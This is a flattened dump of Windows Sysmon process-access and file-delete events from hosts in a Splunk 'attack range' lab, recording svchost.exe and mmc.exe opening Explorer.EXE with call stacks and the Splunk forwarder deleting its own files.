10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.601{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:08.070{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3B953A2BEABDC16D029E35A729FD3F,SHA256=7B5AB57711EA278A7BBF17E9374A45144B3386A0B489CDF764D1341B1EA78B0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:09.604{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=599516D6FE14F9A09F388711B0B3D990,SHA256=9E3E343E6F6D37B86CBFBB17953E6B1FB27DE4A33962621610A659E6D31F7DF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.710{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A421D277A740EC4776AC29737807999E,SHA256=7A19460016553F71C3AA02E63F61887695A515574CF11195DEDCCAA4129AA557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.710{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D9CA55C77771271847344E26DAF791F6,SHA256=0D9E403DF018ABFC1343AA73B7B6425E26BB7ABF1A50A1E4814FDB5402F57A1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.179{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8574F1BBD42A3EBA98F72EBA429D9CC4,SHA256=7CB8383B5F0CFEF7FEDE6DC25AED4B1CDB98044D53552CE19CAFC8E881E4DF06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.070{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.070{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.070{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158 10341000x8000000000000000286585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.070{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.070{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.070{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.070{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158 10341000x8000000000000000286581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.054{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.054{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.054{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.054{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:09.054{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698 